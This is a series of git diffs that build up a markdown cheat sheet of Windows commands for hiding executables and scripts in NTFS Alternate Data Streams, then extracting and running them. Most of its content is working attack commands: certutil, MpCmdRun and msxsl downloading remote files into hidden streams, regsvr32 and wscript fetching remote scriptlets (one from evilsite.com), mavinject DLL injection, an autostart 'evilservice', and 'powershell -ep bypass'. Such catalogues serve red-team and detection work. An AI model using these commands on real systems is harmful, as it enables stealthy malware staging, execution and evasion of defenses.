api0cradle · October 8, 2025 08:06 · Jun 12, 2023 · Oct 22, 2021 · Sep 24, 2021 · Sep 24, 2021
diff --git a/Exe_ADS_Methods.md b/Exe_ADS_Methods.md
@@ -27,6 +27,8 @@
 
 `"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe" -DownloadFile -url https://www.7-zip.org/a/7z1900.exe -path c:\\temp\\1.txt:7-zip.exe`
 
+`msxsl.exe "https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml" "https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl" -o <filename>`
+
 
 # Extract content from ADS
 `expand c:\ads\file.txt:test.exe c:\temp\evil.exe`

diff --git a/Exe_ADS_Methods.md b/Exe_ADS_Methods.md
@@ -27,11 +27,14 @@
 
 `"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe" -DownloadFile -url https://www.7-zip.org/a/7z1900.exe -path c:\\temp\\1.txt:7-zip.exe`
 
+
 # Extract content from ADS
 `expand c:\ads\file.txt:test.exe c:\temp\evil.exe`
 
 `esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o`
 
+`PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder`
+
 # Executing from ADS
 
 ## WMIC

diff --git a/Exe_ADS_Methods.md b/Exe_ADS_Methods.md
@@ -1,107 +1,133 @@
-### Add content to ADS
+# Add content to ADS
 `type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"`
 
-extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
-findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
-certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
-makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
-print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
-reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
-regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
-expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
-esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
-powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
-curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
-cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
-"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe" -DownloadFile -url https://www.7-zip.org/a/7z1900.exe -path c:\\temp\\1.txt:7-zip.exe
-
-###Extract content from ADS###
-expand c:\ads\file.txt:test.exe c:\temp\evil.exe
-esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
-
-###Executing the ADS content###
-
-* WMIC
-wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
-
-* Rundll32
-rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
-rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
-rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
-
-* Cscript
-cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
-
-* Wscript
-wscript c:\ads\file.txt:script.vbs
-echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
-
-* Forfiles
-forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
-
-* Mavinject.exe
+`extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe`
+
+`findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe`
+
+`certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt`
+
+`makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab`
+
+`print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe`
+
+`reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg`
+
+`regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey`
+
+`expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat`
+
+`esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o`
+
+`powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"`
+
+`curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe`
+
+`cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat`
+
+`"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe" -DownloadFile -url https://www.7-zip.org/a/7z1900.exe -path c:\\temp\\1.txt:7-zip.exe`
+
+# Extract content from ADS
+`expand c:\ads\file.txt:test.exe c:\temp\evil.exe`
+
+`esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o`
+
+# Executing from ADS
+
+## WMIC
+`wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'`
+
+## Rundll32
+`rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain`
+
+`rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll`
+
+`rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll`
+
+## Cscript
+`cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"`
+
+## Wscript
+`wscript c:\ads\file.txt:script.vbs`
+
+`echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js`
+
+## Forfiles
+`forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"`
+
+## Mavinject.exe
+```
 c:\windows\SysWOW64\notepad.exe
 tasklist | findstr notepad
 notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
 type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
 c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
+```
 
-* MSHTA
-mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
+## MSHTA
+`mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"`
 (Does not work on Windows 10 1903 and newer)
 
-* Control.exe
-control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
+## Control.exe
+`control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll`
 https://twitter.com/bohops/status/954466315913310209
 
-* Create service and run
+## Service
+```
 sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
 sc start evilservice
+```
 https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
 
-* Powershell.exe
-powershell -ep bypass - < c:\temp:ttt
+## Powershell.exe
+`powershell -ep bypass - < c:\temp:ttt`
 
-* Powershell.exe
-powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
+`powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"`
 
-* Powershell.exe
-Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}
+`Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}`
 
-* Regedit.exe
-regedit c:\ads\file.txt:regfile.reg
+## Regedit.exe
+`regedit c:\ads\file.txt:regfile.reg`
 
-* Bitsadmin.exe
+## Bitsadmin.exe
+```
 bitsadmin /create myfile
 bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
 bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
 bitsadmin /RESUME myfile
+```
 
-* AppVLP.exe
-AppVLP.exe c:\windows\tracing\test.txt:ha.exe
+## AppVLP.exe
+`AppVLP.exe c:\windows\tracing\test.txt:ha.exe`
 
-* Cmd.exe
-cmd.exe - < fakefile.doc:reg32.bat
+## Cmd.exe
+`cmd.exe - < fakefile.doc:reg32.bat`
 https://twitter.com/yeyint_mth/status/1143824979139579904
 
-* Ftp.exe
-ftp -s:fakefile.txt:aaaa.txt
+## Ftp.exe
+`ftp -s:fakefile.txt:aaaa.txt`
 https://github.com/sailay1996/misc-bin/blob/master/ads.md
 
-* ieframe.dll , shdocvw.dll (ads)
+## ieframe.dll , shdocvw.dll (ads)
+```
 echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
 rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
+```
 https://github.com/sailay1996/misc-bin/blob/master/ads.md
 
-* bash.exe
+## bash.exe
+```
 echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
 bash.exe -c $(fakefile.txt:payload.sh)
+```
 https://github.com/sailay1996/misc-bin/blob/master/ads.md
 
-* Regsvr32
+## Regsvr32
+```
 type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
 regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
+```
 
-### Write registry
-regini.exe file.txt:hidden.ini
+## Write registry
+`regini.exe file.txt:hidden.ini`
 From @elisalem9
diff --git a/Exe_ADS_Methods.txt → Exe_ADS_Methods.md b/Exe_ADS_Methods.txt → Exe_ADS_Methods.md
@@ -1,5 +1,6 @@
-###Add content to ADS###
-type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
+### Add content to ADS
+`type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"`
+
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -12,6 +12,7 @@ esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
 powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
 curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
 cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
+"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe" -DownloadFile -url https://www.7-zip.org/a/7z1900.exe -path c:\\temp\\1.txt:7-zip.exe
 
 ###Extract content from ADS###
 expand c:\ads\file.txt:test.exe c:\temp\evil.exe

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -99,3 +99,7 @@ https://github.com/sailay1996/misc-bin/blob/master/ads.md
 * Regsvr32
 type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
 regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
+
+### Write registry
+regini.exe file.txt:hidden.ini
+From @elisalem9
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -1,4 +1,4 @@
-#Add content to ADS
+###Add content to ADS###
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
@@ -13,7 +13,11 @@ powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\
 curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
 cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
 
-#Executing the ADS content
+###Extract content from ADS###
+expand c:\ads\file.txt:test.exe c:\temp\evil.exe
+esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
+
+###Executing the ADS content###
 
 * WMIC
 wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -87,7 +87,11 @@ echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc
 rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
 https://github.com/sailay1996/misc-bin/blob/master/ads.md
 
-' bash.exe
+* bash.exe
 echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
 bash.exe -c $(fakefile.txt:payload.sh)
 https://github.com/sailay1996/misc-bin/blob/master/ads.md
+
+* Regsvr32
+type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
+regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -77,3 +77,17 @@ AppVLP.exe c:\windows\tracing\test.txt:ha.exe
 * Cmd.exe
 cmd.exe - < fakefile.doc:reg32.bat
 https://twitter.com/yeyint_mth/status/1143824979139579904
+
+* Ftp.exe
+ftp -s:fakefile.txt:aaaa.txt
+https://github.com/sailay1996/misc-bin/blob/master/ads.md
+
+* ieframe.dll , shdocvw.dll (ads)
+echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
+rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
+https://github.com/sailay1996/misc-bin/blob/master/ads.md
+
+' bash.exe
+echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
+bash.exe -c $(fakefile.txt:payload.sh)
+https://github.com/sailay1996/misc-bin/blob/master/ads.md
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -28,6 +28,7 @@ cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
 
 * Wscript
 wscript c:\ads\file.txt:script.vbs
+echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
 
 * Forfiles
 forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
@@ -41,6 +42,7 @@ c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35
 
 * MSHTA
 mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
+(Does not work on Windows 10 1903 and newer)
 
 * Control.exe
 control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -11,6 +11,7 @@ expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
 esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
 powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
 curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
+cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
 
 #Executing the ADS content
 
@@ -70,3 +71,7 @@ bitsadmin /RESUME myfile
 
 * AppVLP.exe
 AppVLP.exe c:\windows\tracing\test.txt:ha.exe
+
+* Cmd.exe
+cmd.exe - < fakefile.doc:reg32.bat
+https://twitter.com/yeyint_mth/status/1143824979139579904
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -10,6 +10,7 @@ regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
 expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
 esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
 powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
+curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -66,3 +66,6 @@ bitsadmin /create myfile
 bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
 bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
 bitsadmin /RESUME myfile
+
+* AppVLP.exe
+AppVLP.exe c:\windows\tracing\test.txt:ha.exe
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -55,6 +55,9 @@ powershell -ep bypass - < c:\temp:ttt
 * Powershell.exe
 powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
 
+* Powershell.exe
+Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}
+
 * Regedit.exe
 regedit c:\ads\file.txt:regfile.reg
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -18,6 +18,8 @@ wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfil
 
 * Rundll32
 rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
+rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
+rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
 
 * Cscript
 cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -22,6 +22,9 @@ rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll"
 * Cscript
 cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
 
+* Wscript
+wscript c:\ads\file.txt:script.vbs
+
 * Forfiles
 forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -47,6 +47,9 @@ https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-
 * Powershell.exe
 powershell -ep bypass - < c:\temp:ttt
 
+* Powershell.exe
+powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
+
 * Regedit.exe
 regedit c:\ads\file.txt:regfile.reg
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -9,6 +9,7 @@ reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
 regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
 expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
 esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
+powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -47,4 +47,10 @@ https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-
 powershell -ep bypass - < c:\temp:ttt
 
 * Regedit.exe
-regedit c:\ads\file.txt:regfile.reg
+regedit c:\ads\file.txt:regfile.reg
+
+* Bitsadmin.exe
+bitsadmin /create myfile
+bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
+bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
+bitsadmin /RESUME myfile
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -8,6 +8,7 @@ print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
 reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
 regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
 expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
+esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -7,6 +7,7 @@ makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
 print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
 reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
 regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
+expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -6,6 +6,7 @@ certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/
 makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
 print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
 reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
+regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -42,3 +42,6 @@ https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-
 
 * Powershell.exe
 powershell -ep bypass - < c:\temp:ttt
+
+* Regedit.exe
+regedit c:\ads\file.txt:regfile.reg
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -5,6 +5,7 @@ findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
 makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
 print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
+reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -4,7 +4,7 @@ extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
 makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
-
+print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -3,6 +3,7 @@ type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
+makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
 
 
 #Executing the ADS content

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -2,6 +2,7 @@
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
+certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
 
 
 #Executing the ADS content
@@ -35,4 +36,7 @@ https://twitter.com/bohops/status/954466315913310209
 * Create service and run
 sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
 sc start evilservice
-https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+
+* Powershell.exe
+powershell -ep bypass - < c:\temp:ttt
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -2,7 +2,8 @@
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
-
+
+
 #Executing the ADS content
 
 * WMIC
@@ -33,4 +34,5 @@ https://twitter.com/bohops/status/954466315913310209
 
 * Create service and run
 sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
-sc start evilservice
+sc start evilservice
+https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -1,6 +1,7 @@
 #Add content to ADS
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
-
+extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
+findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
 
 #Executing the ADS content
 
@@ -28,4 +29,8 @@ mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta
 
 * Control.exe
 control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
-https://twitter.com/bohops/status/954466315913310209
+https://twitter.com/bohops/status/954466315913310209
+
+* Create service and run
+sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
+sc start evilservice